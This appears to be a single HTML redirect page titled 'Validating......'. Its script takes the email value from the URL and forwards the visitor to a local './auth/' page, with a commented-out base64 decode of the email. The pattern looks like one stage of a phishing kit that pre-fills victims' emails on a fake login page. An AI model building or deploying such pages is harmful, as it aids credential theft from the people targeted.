<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title>Validating......</title>
    <meta name="viewport" content="width=device-width, initial-scale=1" />
  </head>

  <body>
    <script>
      function redirrectPage() {
        var query = window.location.href;
        console.log(query);
        var res = query.split("?");
        var data1 = res[0];
        var data2 = res[1];
        console.log(data1);
        console.log(data2);

        //realemailID = atob(data2);

        if (data2) {
          console.log("true");
          window.location.href =
            "./auth/?email=" + data2;
        } else {
          console.log("false");
          window.location.href =
            "./auth/?email=" + data2;
        }
      }
      redirrectPage();
    </script>
  </body>
</html>
